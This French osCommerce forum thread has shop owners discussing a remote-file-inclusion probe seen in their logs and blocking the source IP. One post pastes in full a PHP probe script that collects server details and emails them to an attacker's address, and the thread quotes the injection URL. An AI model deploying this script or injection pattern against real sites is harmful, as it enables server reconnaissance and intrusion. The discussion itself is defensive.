[RESOLUT] /index.php?_SERVER[DOCUMENT_ROOT]=http://www.mercedesov

Forums OsCommerce-fr.info

Bienvenue invité ( Connexion | Inscription )

Forum osCommerce-fr > Adapter OsCommerce MS2 > Sécurité - Mises à jour

[RESOLUT] /index.php?_SERVER[DOCUMENT_ROOT]=http://www.mercedesov, Un connecté très bizarre

Options

gotcha5832 Voir le profil	15 Mar 2009, 14:03 Message #1
Ceinture orange+ OSC Groupe : Membres Messages : 343 Inscrit : 27-February 08 Lieu : lune Membre n^o 20966	Bonjour à tous. Voilà j'etait sur who online: Avec google qui etait là depuis 3H avec un ip 66.249.65.240. Normal. Quand tout d'un coup, avec la même session, connecter depuis 3h aussi, mais l'adresse ip à change: 94.126.44.72 et l'adresse ou il est est TRES bizarre: Code /catalog//index.php?_SERVER[DOCUMENT_ROOT]=http://www.mercedesov Du coup part sécurité, je vite ajouter à htaccess: Code order allow,deny deny from 94.126.44.72 allow from all Vous en pensez quoi?? Ce message a été modifié par gotcha5832 - 28 Apr 2009, 06:00. -------------------- Osc-2.2-ms2-FR *Os :* Linux 2.6.24.7-desktop-2mnb *Version PHP :* 5.2.5 (Zend : 2.2.0) *Base de données :* MySQL 5.0.51a *Serveur HTTP :* Apache/2.2.8 (Mandriva Linux/PREFORK-6.1mdv2008.1)

Rogers Voir le profil	16 Mar 2009, 09:03 Message #2
Ceinture marron OSC Groupe : Modérateurs Messages : 1816 Inscrit : 14-March 03 Lieu : Beaune (21200) Membre n^o 961	Il a essayé certainement un script. Le mieux quand tu vois des adresses de ce type c'est de l'essayer pour voir si ça donne quelque chose. Généralement, ça ne donne rien, donc tu es tranquille. Par précaution, tu as bien fait de mettre cette IP dans le htaccess. -------------------- The hardest thing in this world is to live in it. Force jaune devant, marron derrière J'ai touché le fond de la piscine Dans ton petit pull marine...

gotcha5832 Voir le profil	16 Mar 2009, 11:53 Message #3
Ceinture orange+ OSC Groupe : Membres Messages : 343 Inscrit : 27-February 08 Lieu : lune Membre n^o 20966	Je te remercie. C'est ce que je voulais entendre. A vrai dire vu que c'est la première fois que je vois une attaque en live, j'ai peut être over réagit... Merci de ta réponse -------------------- Osc-2.2-ms2-FR *Os :* Linux 2.6.24.7-desktop-2mnb *Version PHP :* 5.2.5 (Zend : 2.2.0) *Base de données :* MySQL 5.0.51a *Serveur HTTP :* Apache/2.2.8 (Mandriva Linux/PREFORK-6.1mdv2008.1)

dvf Voir le profil	16 Mar 2009, 20:16 Message #4
Ceinture orange+ OSC Groupe : Membres Messages : 346 Inscrit : 21-December 05 Membre n^o 8273	avec craltrack tu verrais tous les jours tu en as !

wumpus Voir le profil	17 Mar 2009, 11:49 Message #5
Ceinture orange OSC Groupe : Membres Messages : 254 Inscrit : 18-March 04 Lieu : à 20 Km du Havre Membre n^o 2148	Code <?php //================================= // // scan inb0x hotmail v3.0 // // coded by FilhOte_Ccs and LOST // re-c0d3d by delet // // //================================= // ini_set("max_execution_time",-1); set_time_limit(0); $user = @get_current_user(); $UNAME = @php_uname(); $SafeMode = @ini_get('safe_mode'); if ($SafeMode == '') { $SafeMode = "OFF"; } else { $SafeMode = " $SafeMode "; } $delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); $dados=("<b>Produto</b> = " . $UNAME . " <i>Seguran?a</i> = " . $SafeMode . " http://" . $delet . " Muito obrigado por comprar o hehe1 com: <u>delet</u>"); $email = "vulldoeds@gmail.com"; $assunto = "Teste rox das vull do edson!!!"; $email1 = "vulldoeds@gmail.com"; $headers = "From: <$email>\r\n"; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; if(mail($email1,$assunto,$dados,$headers)){ echo "Isso, ja foi!"; exit(); } else{ echo "N?o foi."; exit(); } ?> Voila ce que j'ai trouvé moi avec crawltrack, par contre si le code n'est pas autorisé merci de l'effacer car mes compétences me permettent pas de savoir si il est dangereux ou pas. Ton attaque : _SERVER[DOCUMENT_ROOT je l'ai eu aussi mais j'arrive pas a retrouver un lien valide sur les adresses que Crawltrack me donne. -------------------- MS2.2-RC1-FR W3C Creload 6.0 SP1.2 RC2, Template Thema 5

« Sujets plus anciens · Sécurité - Mises à jour · Sujets plus récents »

1 utilisateur(s) sur ce sujet (1 invité(s) et 0 utilisateur(s) anonyme(s))

0 membre(s) :

Modes d'affichage: Standard · Passer au mode : Linéaire+ · Passer au mode : Arborescent

Suivre ce sujet · Envoyer ce sujet · Imprimer ce sujet · S'abonner à ce forum

Version bas débit

Nous sommes le : 20th May 2013 - 02:36

Ce site est déclaré auprès de la commision Nationale
de l'Informatique et des Libertés (déclaration n°: 1043896)

Licensed to: osCommerce-France